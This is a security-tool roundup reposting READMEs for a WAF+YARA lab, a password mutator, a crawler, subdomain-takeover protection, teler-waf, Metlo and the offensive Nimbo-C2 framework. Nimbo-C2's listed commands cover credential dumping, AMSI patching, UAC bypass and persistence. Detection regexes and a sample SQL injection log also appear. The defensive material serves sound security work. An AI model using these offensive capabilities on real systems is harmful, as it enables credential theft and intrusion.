    • CERT: malware analysis, determining new IOCs.

    Building Detection Lab

    The Proof of Concept is based on a Debian 11.3.0 (stable) x64 OS, OWASP CRS v3.3.2 and Yara 4.0.5. You will find the automatic installation script in wafaray_install.sh, and an optional manual installation guide in manual_instructions.txt. A PHP page has also been created as a "mock" to observe the interaction and detection of malicious files using WAF + YARA.

    Installation (recommended) with shell scripts

    ✔️Step 2: Deploy using VMware or VirtualBox
    ✔️Step 3: Once installed, please follow the instructions below:
    alex@waf-labs:~$ su root 
    root@waf-labs:/home/alex#

    # Remember to replace YOUR_USER with your username (e.g. waf)
    root@waf-labs:/home/alex# sed -i 's/^\(# User privi.*\)/\1\nalex ALL=(ALL) NOPASSWD:ALL/g' /etc/sudoers
    root@waf-labs:/home/alex# exit
    alex@waf-labs:~$ sudo sed -i 's/^\(deb cdrom.*\)/#\1/g' /etc/apt/sources.list
    alex@waf-labs:~$ sudo sed -i 's/^# \(deb\-src http.*\)/ \1/g' /etc/apt/sources.list
    alex@waf-labs:~$ sudo sed -i 's/^# \(deb http.*\)/ \1/g' /etc/apt/sources.list
    alex@waf-labs:~$ echo -ne "\n\ndeb http://deb.debian.org/debian/ bullseye main\ndeb-src http://deb.debian.org/debian/ bullseye main\n" | sudo tee -a /etc/apt/sources.list
    alex@waf-labs:~$ sudo apt-get update
    alex@waf-labs:~$ sudo apt-get install sudo -y
    alex@waf-labs:~$ sudo apt-get install git vim dos2unix net-tools -y
    alex@waf-labs:~$ git clone https://github.com/alt3kx/wafaray
    alex@waf-labs:~$ cd wafaray
    alex@waf-labs:~$ dos2unix wafaray_install.sh
    alex@waf-labs:~$ chmod +x wafaray_install.sh
    alex@waf-labs:~$ sudo ./wafaray_install.sh >> log_install.log

    # Test your LAB environment
    alex@waf-labs:~$ firefox localhost:8080/upload.php

    Yara Rules

    Once the Yara rules have been downloaded and compiled, you need to customize which rules to apply, just as when you deploy ModSecurity. The following log is an example of the Web Application Firewall + Yara detecting a malicious file; in this case, EICAR was detected.

    Message: Access denied with code 403 (phase 2). File "/temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA" rejected by 
    the approver script "/YaraRules/YaraScripts/modsec_yara.py": 0 SUSPECTED [YaraSignature: eicar]
    [file "/etc/apache2/sites-enabled/test.conf"] [line "56"] [id "500002"]
    [msg "Suspected File Upload:eicar.com.txt -> /temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA - URI: /upload.php"]

    Testing WAFARAY... voilà...

    Stop / Start ModSecurity

    $ sudo service apache2 stop
    $ sudo service apache2 start

    Apache Logs

    $ cd /var/log
    $ sudo tail -f apache2/test_access.log apache2/test_audit.log apache2/test_error.log

    Demos

    Be careful about your test. The following demos were tested on isolated virtual machines.

    Demo 1 - EICAR

    A malicious file is uploaded, and the ModSecurity rules plus Yara deny uploading the file to the backend if it matches at least one Yara rule. (Example of malware: https://secure.eicar.org/eicar.com.txt) DO NOT EXECUTE THE FILE.

    Demo 2 - WebShell.php

    For this demo, we disable rule 933110 - PHP Injection Attack to validate the Yara rules. A malicious file is uploaded, and the ModSecurity rules plus Yara deny uploading the file to the backend if it matches at least one Yara rule. (Example of PHP webshell: https://github.com/drag0s/php-webshell) DO NOT EXECUTE THE FILE.

    Demo 3 - Malware Bazaar (RecordBreaker) Published: 2022-08-13

    A malicious file is uploaded, and the ModSecurity rules plus Yara deny uploading the file to the backend if it matches at least one Yara rule. (Example of Malware Bazaar (RecordBreaker): https://bazaar.abuse.ch/sample/94ffc1624939c5eaa4ed32d19f82c369333b45afbbd9d053fa82fe8f05d91ac2/) DO NOT EXECUTE THE FILE.

    YARA Rules sources

    In case you want to download more Yara rules, you can check the following repositories:

    References

    Roadmap until next release

    • Malware Hash Database (MLDBM). The database stores the MD5 or SHA1 hashes of files detected as suspicious.
    • Test the new CRS ModSecurity v3.3.3 rules.
    • Improve the ModSecurity rules for malware detection using the database.
    • Create blacklists and whitelists based on MD5 or SHA1 hashes.
    • Test running the Yara analysis in the background if it takes more than 3 seconds.
    • Test new payloads, for example obfuscated PowerShell (webshells).
    • Remarks for live environments (WAF AWS, WAF GCP, ...).

    Authors

    Alex Hernandez aka (@_alt3kx_)
    Jesus Huerta aka @mindhack03d

    Contributors

    Israel Zeron Medina aka @spk085



    PassMute - A Multi-Featured Password Transmutation/Mutator Tool

    By: Zion3R


    This is a command-line tool written in Python that applies one or more transmutation rules to a given password or a list of passwords read from one or more files. The tool can be used to generate transformed passwords for security testing or research purposes. It can also be very useful for brute-forcing passwords during penetration tests!


    How can PassMute also help to secure passwords?

    PassMute can help to generate strong and complex passwords by applying different transformation rules to the input password. However, password security also depends on other factors such as the length of the password, randomness, and avoiding common phrases or patterns.

    The transformation rules include:

    reverse: reverses the password string

    uppercase: converts the password to uppercase letters

    lowercase: converts the password to lowercase letters

    swapcase: swaps the case of each letter in the password

    capitalize: capitalizes the first letter of the password

    leet: replaces some letters in the password with their leet equivalents

    strip: removes all whitespace characters from the password

    The tool can also write the transformed passwords to an output file and run the transformation process in parallel using multiple threads.
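
    The core idea of the rules listed above can be sketched in a few lines of Python. This is an illustrative approximation rather than PassMute's actual implementation; in particular, the leet substitution table is an assumption.

    LEET = str.maketrans("aeios", "43105")  # assumed leet mapping for illustration

    RULES = {
        "reverse":    lambda p: p[::-1],
        "uppercase":  str.upper,
        "lowercase":  str.lower,
        "swapcase":   str.swapcase,
        "capitalize": str.capitalize,
        "leet":       lambda p: p.translate(LEET),
        "strip":      lambda p: "".join(p.split()),
    }

    def transmute(password, rule_names):
        # apply each requested rule to the original password and collect the variants
        return [RULES[name](password) for name in rule_names]

    print(transmute("HITH Hack3r", ["leet", "reverse", "swapcase"]))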

    Installation

    git clone https://github.com/HITH-Hackerinthehouse/PassMute.git
    cd PassMute
    chmod +x PassMute.py

    Usage

    To use the tool, you need to have Python 3 installed on your system. Then, you can run the tool from the command line using the following options:

    python PassMute.py [-h] [-f FILE [FILE ...]] -r RULES [RULES ...] [-v] [-p PASSWORD] [-o OUTPUT] [-t THREAD_TIMEOUT] [--max-threads MAX_THREADS]

    Here's a brief explanation of the available options:

    -h or --help: shows the help message and exits

    -f (FILE) [FILE ...], --file (FILE) [FILE ...]: one or more files to read passwords from

    -r (RULES) [RULES ...] or --rules (RULES) [RULES ...]: one or more transformation rules to apply

    -v or --verbose: prints verbose output for each password transformation

    -p (PASSWORD) or --password (PASSWORD): transforms a single password

    -o (OUTPUT) or --output (OUTPUT): output file to save the transformed passwords

    -t (THREAD_TIMEOUT) or --thread-timeout (THREAD_TIMEOUT): timeout for threads to complete (in seconds)

    --max-threads (MAX_THREADS): maximum number of threads to run simultaneously (default: 10)

    NOTE: If you get any error regarding the argparse module, simply install it with the following command: pip install argparse

    Examples

    Here are some example commands that read passwords from a file, apply transformation rules, and save the transformed passwords to an output file:

    Single Password transmutation: python PassMute.py -p HITHHack3r -r leet reverse swapcase -v -t 50

    Multiple Password transmutation: python PassMute.py -f testwordlists.txt -r leet reverse -v -t 100 -o testupdatelists.txt

    Verbose mode and threading are recommended when transmuting big files; it also depends on your processor, and using threads and verbose mode is not required every time.

    Legal Disclaimer:

    You might be super excited to use this tool, and so are we. But here we need to be clear: Hackerinthehouse, the contributors of this project and GitHub won't be responsible for any actions made by you. This tool is made for security research and educational purposes only. It is the end user's responsibility to obey all applicable local, state and federal laws.



    SpiderSuite - Advance Web Spider/Crawler For Cyber Security Professionals

    By: Zion3R


    An advanced cross-platform and multi-feature GUI web spider/crawler for cyber security professionals. Spider Suite can be used for attack surface mapping and analysis. For more information visit SpiderSuite's website.


    Installation and Usage

    Spider Suite is designed for easy installation and usage even for first timers.

    • First, download the package of your choice.

    • Then install the downloaded SpiderSuite package.

    • See the First time crawling with SpiderSuite article for a tutorial on how to get started.

    For complete documentation of Spider Suite see wiki.

    Contributing

    Can you translate?

    Visit SpiderSuite's translation project to make translations to your native language.

    Not a developer?

    You can help by reporting bugs, requesting new features, improving the documentation, sponsoring the project & writing articles.

    For More information see contribution guide.

    Contributors

    Credits

    This product includes software developed by the following open source projects:



    Domain-Protect - OWASP Domain Protect - Prevent Subdomain Takeover

    By: Zion3R

    OWASP Global AppSec Dublin - talk and demo


    Features

    • scan Amazon Route53 across an AWS Organization for domain records vulnerable to takeover
    • scan Cloudflare for vulnerable DNS records
    • take over vulnerable subdomains yourself before attackers and bug bounty researchers
    • automatically create known issues in Bugcrowd or HackerOne
    • vulnerable domains in Google Cloud DNS can be detected by Domain Protect for GCP
    • manual scans of cloud accounts with no installation

    Installation

    Collaboration

    We welcome collaborators! Please see the OWASP Domain Protect website for more details.

    Documentation

    Manual scans - AWS
    Manual scans - CloudFlare
    Architecture
    Database
    Reports
    Automated takeover optional feature
    Cloudflare optional feature
    Bugcrowd optional feature
    HackerOne optional feature
    Vulnerability types
    Vulnerable A records (IP addresses) optional feature
    Requirements
    Installation
    Slack Webhooks
    AWS IAM policies
    CI/CD
    Development
    Code Standards
    Automated Tests
    Manual Tests
    Conference Talks and Blog Posts

    Limitations

    This tool cannot guarantee 100% protection against subdomain takeovers.



    Nimbo-C2 - Yet Another (Simple And Lightweight) C2 Framework

    By: Zion3R

    About

    Nimbo-C2 is yet another (simple and lightweight) C2 framework.

    Nimbo-C2 agent supports x64 Windows & Linux. It's written in Nim, with some usage of .NET on Windows (by dynamically loading the CLR into the process). Nim is powerful, but interacting with Windows is much easier and more robust using PowerShell, hence this combination. The Linux agent is slimmer and capable only of basic commands, including ELF loading using the memfd technique.

    All server components are written in Python:

    • HTTP listener that manages the agents.
    • Builder that generates the agent payloads.
    • Nimbo-C2 is the interactive C2 component that rules 'em all!

    My work wouldn't be possible without the previous great work done by others, listed under credits.


    Features

    • Build EXE, DLL, ELF payloads.
    • Encrypted implant configuration and strings using NimProtect.
    • Packing payloads using UPX and obfuscating the PE section names (UPX0, UPX1) to make detection and unpacking harder.
    • Encrypted HTTP communication (AES in CBC mode, key hardcoded in the agent and configurable via config.jsonc).
    • Auto-completion in the C2 Console for convenient interaction.
    • In-memory Powershell commands execution.
    • File download and upload commands.
    • Built-in discovery commands.
    • Screenshot taking, clipboard stealing, audio recording.
    • Memory evasion techniques like NTDLL unhooking, ETW & AMSI patching.
    • LSASS and SAM hives dumping.
    • Shellcode injection.
    • Inline .NET assemblies execution.
    • Persistence capabilities.
    • UAC bypass methods.
    • ELF loading using memfd in 2 modes.
    • And more !

    Installation

    Easy Way

    1. Clone the repository and cd into it:
    git clone https://github.com/itaymigdal/Nimbo-C2
    cd Nimbo-C2
    2. Build the docker image:
    docker build -t nimbo-dependencies .
    3. cd again into the source files and run the docker image interactively, exposing port 80 and mounting the Nimbo-C2 directory to the container (so you can easily access all project files, modify config.jsonc, download and upload files from agents, etc.). For Linux, replace ${pwd} with $(pwd).
    cd Nimbo-C2
    docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 nimbo-dependencies

    Easier Way

    git clone https://github.com/itaymigdal/Nimbo-C2
    cd Nimbo-C2/Nimbo-C2
    docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 itaymigdal/nimbo-dependencies

    Usage

    First, edit config.jsonc for your needs.

    Then run with: python3 Nimbo-C2.py

    Use the help command for each screen, and tab completion.

    Also, check the examples directory.

    Main Window

    Nimbo-C2 > help

    --== Agent ==--
    agent list -> list active agents
    agent interact <agent-id> -> interact with the agent
    agent remove <agent-id> -> remove agent data

    --== Builder ==--
    build exe -> build exe agent (-h for help)
    build dll -> build dll agent (-h for help)
    build elf -> build elf agent (-h for help)

    --== Listener ==--
    listener start -> start the listener
    listener stop -> stop the listener
    listener status -> print the listener status

    --== General ==--
    cls -> clear the screen
    help -> print this help message
    exit -> exit Nimbo-C2

    Agent Window

    Windows agent

    Nimbo-2 [d337c406] > help

    --== Send Commands ==--
    cmd <shell-command> -> execute a shell command
    iex <powershell-scriptblock> -> execute in-memory powershell command

    --== File Stuff ==--
    download <remote-file> -> download a file from the agent (wrap path with quotes)
    upload <local-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

    --== Discovery Stuff ==--
    pstree -> show process tree
    checksec -> check for security products
    software -> check for installed software

    --== Collection Stuff ==--
    clipboard -> retrieve clipboard
    screenshot -> retrieve screenshot
    audio <record-time> -> record audio

    --== Post Exploitation Stuff ==--
    lsass <method> -> dump lsass.exe [methods: direct,comsvcs] (elevation required)
    sam -> dump sam,security,system hives using reg.exe (elevation required)
    shellc <raw-shellcode-file> <pid> -> inject shellcode to remote process
    assembly <local-assembly> <args> -> execute .net assembly (pass all args as a single string using quotes)
    warning: make sure the assembly doesn't call any exit function

    --== Evasion Stuff ==--
    unhook -> unhook ntdll.dll
    amsi -> patch amsi out of the current process
    etw -> patch etw out of the current process

    --== Persistence Stuff ==--
    persist run <command> <key-name> -> set run key (will try first hklm, then hkcu)
    persist spe <command> <process-name> -> persist using silent process exit technique (elevation required)

    --== Privesc Stuff ==--
    uac fodhelper <command> <keep/die> -> elevate session using the fodhelper uac bypass technique
    uac sdclt <command> <keep/die> -> elevate session using the sdclt uac bypass technique

    --== Interaction stuff ==--
    msgbox <title> <text> -> pop a message box (blocking! waits for enter press)
    speak <text> -> speak using sapi.spvoice com interface

    --== Communication Stuff ==--
    sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
    clear -> clear pending commands
    collect -> recollect agent data
    kill -> kill the agent (persistence will still take place)

    --== General ==--
    show -> show agent details
    back -> back to main screen
    cls -> clear the screen
    help -> print this help message
    exit -> exit Nimbo-C2

    Linux agent

    Nimbo-2 [51a33cb9] > help

    --== Send Commands ==--
    cmd <shell-command> -> execute a terminal command

    --== File Stuff ==--
    download <remote-file> -> download a file from the agent (wrap path with quotes)
    upload <local-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

    --== Post Exploitation Stuff ==--
    memfd <mode> <elf-file> <commandline> -> load elf in-memory using the memfd_create syscall
    implant mode: load the elf as a child process and return
    task mode: load the elf as a child process, wait on it, and get its output when it's done
    (pass the whole commandline as a single string using quotes)

    --== Communication Stuff ==--
    sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
    clear -> clear pending commands
    collect -> recollect agent data
    kill -> kill the agent (persistence will still take place)

    --== General ==--
    show -> show agent details
    back -> back to main screen
    cls -> clear the screen
    help -> print this help message
    exit -> exit Nimbo-C2

    Limitations & Warnings

    • Even though the HTTP communication is encrypted, the 'User-Agent' header is in plain text and carries the real agent id, which some products may flag as suspicious.
    • When using the assembly command, make sure your assembly doesn't call any exit function, because it will kill the agent.
    • The shellc command may unexpectedly crash or change the injected process's behavior; test the shellcode and the target process first.
    • The audio, lsass and sam commands temporarily save artifacts to disk before exfiltrating and deleting them.
    • Cleaning up the persist commands should be done manually.
    • Specify whether to keep or kill the initiating agent process in the uac commands. The die flag may leave you with no active agent (if the unelevated agent thinks that the UAC bypass was successful when it wasn't), while keep should leave you with 2 active agents probing the C2; you should then manually kill the unelevated one.
    • msgbox is blocking until the user presses the OK button.

    Contribution

    This software may be buggy or unstable in some use cases as it is not fully and constantly tested. Feel free to open issues, PRs, and contact me for any reason at (Gmail | Linkedin | Twitter).

    Credits

    • OffensiveNim - Great resource that taught me a lot about leveraging Nim for implant tasks. Some of Nimbo-C2's agent capabilities are basically wrappers around modified OffensiveNim examples.
    • Python-Prompt-Toolkit-3 - Awesome library for developing Python CLI applications. The Nimbo-C2 interactive console was developed using it.
    • ascii-image-converter - For the awesome Nimbo ascii art.
    • All those random people from GitHub & Stack Overflow whose code I copied & pasted.


    Teler-Waf - A Go HTTP Middleware That Provides Teler IDS Functionality To Protect Against Web-Based Attacks And Improve The Security Of Go-based Web Applications

    By: Zion3R

    teler-waf is a comprehensive security solution for Go-based web applications. It acts as an HTTP middleware, providing an easy-to-use interface for integrating teler IDS functionality into existing Go applications. By using teler-waf, you can help protect against a variety of web-based attacks, such as cross-site scripting (XSS) and SQL injection.

    The package comes with a standard net/http.Handler, making it easy to integrate into your application's routing. When a client makes a request to a route protected by teler-waf, the request is first checked against the teler IDS to detect known malicious patterns. If no malicious patterns are detected, the request is then passed through for further processing.

    In addition to providing protection against web-based attacks, teler-waf can also help improve the overall security and integrity of your application. It is highly configurable, allowing you to tailor it to fit the specific needs of your application.


    See also:

    • kitabisa/teler: Real-time HTTP intrusion detection.
    • dwisiswant0/cox: Cox is bluemonday-wrapper to perform a deep-clean and/or sanitization of (nested-)interfaces from HTML to prevent XSS payloads.

    Features

    Some core features of teler-waf include:

    • HTTP middleware for Go web applications.
    • Integration of teler IDS functionality.
    • Detection of known malicious patterns using the teler IDS.
      • Common web attacks, such as cross-site scripting (XSS) and SQL injection, etc.
      • CVEs, covers known vulnerabilities and exploits.
      • Bad IP addresses, such as those associated with known malicious actors or botnets.
      • Bad HTTP referers, such as those that are not expected based on the application's URL structure or are known to be associated with malicious actors.
      • Bad crawlers, covers requests from known bad crawlers or scrapers, such as those that are known to cause performance issues or attempt to extract sensitive information from the application.
      • Directory bruteforce attacks, such as by trying common directory names or using dictionary attacks.
    • Configuration options to whitelist specific types of requests based on their URL or headers.
    • Easy integration with many frameworks.
    • High configurability to fit the specific needs of your application.

    Overall, teler-waf provides a comprehensive security solution for Go-based web applications, helping to protect against web-based attacks and improve the overall security and integrity of your application.

    Install

    To install teler-waf in your Go application, run the following command to download and install the teler-waf package:

    go get github.com/kitabisa/teler-waf

    Usage

    Here is an example of how to use teler-waf in a Go application:

    1. Import the teler-waf package in your Go code:
    import "github.com/kitabisa/teler-waf"
    2. Use the New function to create a new instance of the Teler type. This function takes a variety of optional parameters that can be used to configure teler-waf to suit the specific needs of your application.
    waf := teler.New()
    3. Use the Handler method of the Teler instance to create a net/http.Handler. This handler can then be used in your application's HTTP routing to apply teler-waf's security measures to specific routes.
    handler := waf.Handler(http.HandlerFunc(yourHandlerFunc))
    4. Use the handler in your application's HTTP routing to apply teler-waf's security measures to specific routes.
    http.Handle("/path", handler)

    That's it! You have configured teler-waf in your Go application.

    Options:

    For a list of the options available to customize teler-waf, see the teler.Options struct.

    Examples

    Here is an example of how to customize the options and rules for teler-waf:

    // main.go
    package main

    import (
        "net/http"

        "github.com/kitabisa/teler-waf"
        "github.com/kitabisa/teler-waf/request"
        "github.com/kitabisa/teler-waf/threat"
    )

    var myHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
        // This is the handler function for the route that we want to protect
        // with teler-waf's security measures.
        w.Write([]byte("hello world"))
    })

    var rejectHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
        // This is the handler function for the route that we want to be rejected
        // if the teler-waf's security measures are triggered.
        http.Error(w, "Sorry, your request has been denied for security reasons.", http.StatusForbidden)
    })

    func main() {
        // Create a new instance of the Teler type using the New function
        // and configure it using the Options struct.
        telerMiddleware := teler.New(teler.Options{
            // Exclude specific threats from being checked by the teler-waf.
            Excludes: []threat.Threat{
                threat.BadReferrer,
                threat.BadCrawler,
            },
            // Specify whitelisted URIs (path & query parameters), headers,
            // or IP addresses that will always be allowed by the teler-waf.
            Whitelists: []string{
                `(curl|Go-http-client|okhttp)/*`,
                `^/wp-login\.php`,
                `(?i)Referer: https?:\/\/www\.facebook\.com`,
                `192\.168\.0\.1`,
            },
            // Specify custom rules for the teler-waf to follow.
            Customs: []teler.Rule{
                {
                    // Give the rule a name for easy identification.
                    Name: "Log4j Attack",
                    // Specify the logical operator to use when evaluating the rule's conditions.
                    Condition: "or",
                    // Specify the conditions that must be met for the rule to trigger.
                    Rules: []teler.Condition{
                        {
                            // Specify the HTTP method that the rule applies to.
                            Method: request.GET,
                            // Specify the element of the request that the rule applies to
                            // (e.g. URI, headers, body).
                            Element: request.URI,
                            // Specify the pattern to match against the element of the request.
                            Pattern: `\$\{.*:\/\/.*\/?\w+?\}`,
                        },
                    },
                },
            },
            // Specify the file path to use for logging.
            LogFile: "/tmp/teler.log",
        })

        // Set the rejectHandler as the handler for the telerMiddleware.
        telerMiddleware.SetHandler(rejectHandler)

        // Create a new handler using the handler method of the Teler instance
        // and pass in the myHandler function for the route we want to protect.
        app := telerMiddleware.Handler(myHandler)

        // Use the app handler as the handler for the route.
        http.ListenAndServe("127.0.0.1:3000", app)
    }

    Warning: When using a whitelist, any request that matches it will be returned without further analysis, regardless of the type of threat it poses.

    To illustrate, suppose you set up a whitelist to permit requests containing a certain string. In the event that a request contains that string but also includes a payload such as an SQL injection or cross-site scripting (XSS) attack, the request may not be thoroughly analyzed for common web attack threats and will be swiftly returned. See issue #25.

    For more examples of how to use teler-waf or integrate it with any framework, take a look at examples/ directory.

    Development

    By default, teler-waf caches all incoming requests for 15 minutes & clear them every 20 minutes to improve the performance. However, if you're still customizing the settings to match the requirements of your application, you can disable caching during development by setting the development mode option to true. This will prevent incoming requests from being cached and can be helpful for debugging purposes.

    // Create a new instance of the Teler type using
    // the New function & enable development mode option.
    telerMiddleware := teler.New(teler.Options{
        Development: true,
    })

    Logs

    Here is an example of what the log lines would look like if teler-waf detects a threat on a request:

    {"level":"warn","ts":1672261174.5995026,"msg":"bad crawler","id":"654b85325e1b2911258a","category":"BadCrawler","request":{"method":"GET","path":"/","ip_addr":"127.0.0.1:37702","headers":{"Accept":["*/*"],"User-Agent":["curl/7.81.0"]},"body":""}}
    {"level":"warn","ts":1672261175.9567692,"msg":"directory bruteforce","id":"b29546945276ed6b1fba","category":"DirectoryBruteforce","request":{"method":"GET","path":"/.git","ip_addr":"127.0.0.1:37716","headers":{"Accept":["*/*"],"User-Agent":["X"]},"body":""}}
    {"level":"warn","ts":1672261177.1487508,"msg":"Detects common comment types","id":"75412f2cc0ec1cf79efd","category":"CommonWebAttack","request":{"method":"GET","path":"/?id=1%27% 20or%201%3D1%23","ip_addr":"127.0.0.1:37728","headers":{"Accept":["*/*"],"User-Agent":["X"]},"body":""}}

    The id is a unique identifier that is generated when a request is rejected by teler-waf. It is included in the HTTP response headers of the request (X-Teler-Req-Id), and can be used to troubleshoot issues with requests that are being made to the website.

    For example, if a request to a website returns an HTTP error status code, such as a 403 Forbidden, the teler request ID can be used to identify the specific request that caused the error and help troubleshoot the issue.

    Teler request IDs are used by teler-waf to track requests made to your web application and can be useful for debugging and analyzing traffic patterns on a website.

    Datasets

    The teler-waf package utilizes a dataset of threats to identify and analyze each incoming request for potential security threats. This dataset is updated daily, which means that you will always have the latest resource. The dataset is initially stored in the user-level cache directory (on Unix systems, it returns $XDG_CACHE_HOME/teler-waf as specified by XDG Base Directory Specification if non-empty, else $HOME/.cache/teler-waf. On Darwin, it returns $HOME/Library/Caches/teler-waf. On Windows, it returns %LocalAppData%/teler-waf. On Plan 9, it returns $home/lib/cache/teler-waf) on your first launch. Subsequent launch will utilize the cached dataset, rather than downloading it again.

    Note: The threat datasets are obtained from the kitabisa/teler-resources repository.

    However, there may be situations where you want to disable automatic updates to the threat dataset. For example, you may have a slow or limited internet connection, or you may be using a machine with restricted file access. In these cases, you can set an option called NoUpdateCheck to true, which will prevent the teler-waf from automatically updating the dataset.

    // Create a new instance of the Teler type using the New
    // function & disable automatic updates to the threat dataset.
    telerMiddleware := teler.New(teler.Options{
        NoUpdateCheck: true,
    })

    Finally, there may be cases where it's necessary to load the threat dataset into memory rather than saving it to a user-level cache directory. This can be particularly useful if you're running the application or service on a distroless or runtime image, where file access may be limited or slow. In this scenario, you can set an option called InMemory to true, which will load the threat dataset into memory for faster access.

    // Create a new instance of the Teler type using the
    // New function & enable in-memory threat datasets store.
    telerMiddleware := teler.New(teler.Options{
        InMemory: true,
    })

    Warning: This may also consume more system resources, so it's worth considering the trade-offs before making this decision.

    Resources

    Security

    If you discover a security issue, please bring it to our attention right away; we take security seriously!

    Reporting a Vulnerability

    If you have information about a security issue or vulnerability in this teler-waf package, and/or you are able to successfully execute an attack such as cross-site scripting (XSS) and pop up an alert in our demo site (see resources), please do NOT file a public issue; instead, kindly send your report privately via the vulnerability report form or to our official channels as per our security policy.

    Limitations

    Here are some limitations of using teler-waf:

    • Performance overhead: teler-waf may introduce some performance overhead, as it needs to process each incoming request. If you have a high volume of traffic, this can potentially slow down the overall performance of your application significantly, especially if you enable the CVEs threat detection. See the benchmark below:
    $ go test -bench . -cpu=4
    goos: linux
    goarch: amd64
    pkg: github.com/kitabisa/teler-waf
    cpu: 11th Gen Intel(R) Core(TM) i9-11900H @ 2.50GHz
    BenchmarkTelerDefaultOptions-4 42649 24923 ns/op 6206 B/op 97 allocs/op
    BenchmarkTelerCommonWebAttackOnly-4 48589 23069 ns/op 5560 B/op 89 allocs/op
    BenchmarkTelerCVEOnly-4 48103 23909 ns/op 5587 B/op 90 allocs/op
    BenchmarkTelerBadIPAddressOnly-4 47871 22846 ns/op 5470 B/op 87 allocs/op
    BenchmarkTelerBadReferrerOnly-4 47558 23917 ns/op 5649 B/op 89 allocs/op
    BenchmarkTelerBadCrawlerOnly-4 42138 24010 ns/op 5694 B/op 86 allocs/op
    BenchmarkTelerDirectoryBruteforceOnly-4 45274 23523 ns/op 5657 B/op 86 allocs/op
    BenchmarkTelerCustomRule-4 48193 22821 ns/op 5434 B/op 86 allocs/op
    BenchmarkTelerWithoutCommonWebAttack-4 44524 24822 ns/op 6054 B/op 94 allocs/op
    BenchmarkTelerWithoutCVE-4 46023 25732 ns/op 6018 B/op 93 allocs/op
    BenchmarkTelerWithoutBadIPAddress-4 39205 25927 ns/op 6220 B/op 96 allocs/op
    BenchmarkTelerWithoutBadReferrer-4 45228 24806 ns/op 5967 B/op 94 allocs/op
    BenchmarkTelerWithoutBadCrawler-4 45806 26114 ns/op 5980 B/op 97 allocs/op
    BenchmarkTelerWithoutDirectoryBruteforce-4 44432 25636 ns/op 6185 B/op 97 allocs/op
    PASS
    ok github.com/kitabisa/teler-waf 25.759s

    Note: Benchmarking results may vary and may not be consistent. Those results were obtained when there were >1.5k CVE templates and the teler-resources dataset may have increased since then, which may impact the results.

    • Configuration complexity: Configuring teler-waf to suit the specific needs of your application can be complex, and may require a certain level of expertise in web security. This can make it difficult for those who are not familiar with application firewalls and IDS systems to properly set up and use teler-waf.
    • Limited protection: teler-waf is not a perfect security solution, and it may not be able to protect against all possible types of attacks. As with any security system, it is important to regularly monitor and maintain teler-waf to ensure that it is providing the desired level of protection.

    Known Issues

    To view a list of known issues with teler-waf, please filter the issues by the "known-issue" label.

    License

    This program is developed and maintained by members of Kitabisa Security Team, and this is not an officially supported Kitabisa product. This program is free software: you can redistribute it and/or modify it under the terms of the Apache license. Kitabisa teler-waf and any contributions are copyright © by Dwi Siswanto 2022-2023.



    Metlo - An Open-Source API Security Platform

    By: Zion3R

    Secure Your API.


    Metlo is an open-source API security platform

    With Metlo you can:

    • Create an Inventory of all your API Endpoints and Sensitive Data.
    • Detect common API vulnerabilities.
    • Proactively test your APIs before they go into production.
    • Detect API attacks in real time.

    Metlo does this by scanning your API traffic using one of our connectors and then analyzing trace data.


    There are three ways to get started with Metlo. Metlo Cloud, Metlo Self Hosted, and our Open Source product. We recommend Metlo Cloud for almost all users as it scales to 100s of millions of requests per month and all upgrades and migrations are managed for you.

    You can get started with Metlo Cloud right away without a credit card. Just make an account on https://app.metlo.com and follow the instructions in our docs here.

    Although we highly recommend Metlo Cloud, if you're a large company or need an air-gapped system you can self host Metlo as well! Create an account on https://my.metlo.com and follow the instructions on our docs here to setup Metlo in your own Cloud environment.

    If you want to deploy our Open Source product we have instructions for AWS, GCP, Azure and Docker.

    You can also join our Discord community if you need help or just want to chat!

    Features

    • Endpoint Discovery - Metlo scans network traffic and creates an inventory of every single endpoint in your API.
    • Sensitive Data Scanning - Each endpoint is scanned for PII data and given a risk score.
    • Vulnerability Discovery - Get Alerts for issues like unauthenticated endpoints returning sensitive data, No HSTS headers, PII data in URL params, Open API Spec Diffs and more
    • API Security Testing - Build security tests directly in Metlo. Autogenerate tests for OWASP Top 10 vulns like BOLA, Broken Authentication, SQL Injection and more.
    • CI/CD Integration - Integrate with your CI/CD to find issues in development and staging.
    • Attack Detection - Our ML Algorithms build a model for baseline API behavior. Any deviation from this baseline is surfaced to your security team as soon as possible.
    • Attack Context - Metlo’s UI gives you full context around any attack to help quickly fix the vulnerability.

    Testing

    For tests that we can't autogenerate, our built-in testing framework helps you get to 100% security coverage on your highest-risk APIs. You can build tests in a YAML format to make sure your API is working as intended.

    For example the following test checks for broken authentication:

    id: test-payment-processor-metlo.com-user-billing

    meta:
      name: test-payment-processor.metlo.com/user/billing Test Auth
      severity: CRITICAL
      tags:
        - BROKEN_AUTHENTICATION

    test:
      - request:
          method: POST
          url: https://test-payment-processor.metlo.com/user/billing
          headers:
            - name: Content-Type
              value: application/json
            - name: Authorization
              value: ...
          data: |-
            { "ccn": "...", "cc_exp": "...", "cc_code": "..." }
        assert:
          - key: resp.status
            value: 200
      - request:
          method: POST
          url: https://test-payment-processor.metlo.com/user/billing
          headers:
            - name: Content-Type
              value: application/json
          data: |-
            { "ccn": "...", "cc_exp": "...", "cc_code": "..." }
        assert:
          - key: resp.status
            value: [ 401, 403 ]

    You can see more information on our docs.

    Why Metlo?

    Most businesses have adopted public facing APIs to power their websites and apps. This has dramatically increased the attack surface for your business. There’s been a 200% increase in API security breaches in just the last year with the APIs of companies like Uber, Meta, Experian and Just Dial leaking millions of records. It's obvious that tools are needed to help security teams make APIs more secure but there's no great solution on the market.

    Some solutions require you to go through sales calls to even try the product, while others have you send all your API traffic to their own cloud. Metlo is the first Open Source API security platform that you can self-host, and get started with for free right away!

    We're Hiring!

    We would love for you to come help us make Metlo better. Come join us at Metlo!

    Open-source vs. paid

    This repo is entirely MIT licensed. Features like user management, user roles and attack protection require an enterprise license. Contact us for more information.

    Development

    Checkout our development guide for more info on how to develop Metlo locally.



